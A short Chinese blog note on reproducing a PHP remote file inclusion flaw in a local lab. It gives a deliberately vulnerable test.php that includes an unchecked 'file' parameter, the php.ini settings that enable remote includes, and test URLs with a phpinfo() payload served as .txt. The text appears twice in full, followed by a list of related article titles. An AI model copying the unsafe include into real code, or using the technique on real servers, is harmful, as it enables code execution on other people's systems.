远程文件包含漏洞测试
2013-09-16 17:15
423 查看
在本地搭建test.php
<?php
if( !ini_get('display_errors') ) {
ini_set('display_errors', 'On');
}
error_reporting(E_ALL);
$f = $_GET["file"];
if ($f){
//require "".$f.".php";
include "".$f;
}else{
print("No File Included");
}
?>
---------------------------------
http://xxx.com/test.php?file=123 本地的成功
http://xxx.com/test.php?file=http://xxx.com/123
远程的不成功
---------------------------------
打开php.ini文件的:
allow_url_fopen = On
allow_url_include = On
---------------------------------
http://xxx.com/test.php?file=http://xxx.com/123
远程的成功
-----------------------------------------------------------------------------------------------------------------------------------------------------------
注:在使用远程文件包含时,攻击代码必需为.txt后缀
如远程空间为:
phpinfo.php --->包含后的信息为远程服务器的phpinfo信息
phpinfo.txt
--->包含后才是漏洞服务器的phpinfo信息
内容同为:
<?php
phpinfo();
?>
<?php
if( !ini_get('display_errors') ) {
ini_set('display_errors', 'On');
}
error_reporting(E_ALL);
$f = $_GET["file"];
if ($f){
//require "".$f.".php";
include "".$f;
}else{
print("No File Included");
}
?>
---------------------------------
http://xxx.com/test.php?file=123 本地的成功
http://xxx.com/test.php?file=http://xxx.com/123
远程的不成功
---------------------------------
打开php.ini文件的:
allow_url_fopen = On
allow_url_include = On
---------------------------------
http://xxx.com/test.php?file=http://xxx.com/123
远程的成功
-----------------------------------------------------------------------------------------------------------------------------------------------------------
注:在使用远程文件包含时,攻击代码必需为.txt后缀
如远程空间为:
phpinfo.php --->包含后的信息为远程服务器的phpinfo信息
phpinfo.txt
--->包含后才是漏洞服务器的phpinfo信息
内容同为:
<?php
phpinfo();
?>
相关文章推荐
- rgboard 3.0.12 远程文件包含漏洞
- 远程文件包含漏洞的利用
- 是什么造成PHP远程文件包含漏洞产生
- Dvwa漏洞测试之文件包含笔记
- 远程文件包含漏洞的利用
- PHP 网络开发详解之远程文件包含漏洞
- 远程文件包含漏洞的利用
- WordPress Browser Rejector 插件"wppath"远程文件包含漏洞
- 探讨PHP远程文件包含漏洞产生原因
- Wordpress Gallery插件'load'参数远程文件包含漏洞
- 文件包含漏洞之本地包含和远程包含
- dvwa文件包含漏洞和远程文件利用漏洞
- php远程文件包含漏洞
- 详解远程文件包含漏洞
- WordPress Export To Text插件‘download’参数远程文件包含漏洞
- 渗透测试之本地文件包含漏洞
- php本地及远程文件包含漏洞
- php远程文件包含漏洞简述
- Phpcms 2007 远程文件包含漏洞
- php 远程包含文件漏洞分析第1/6页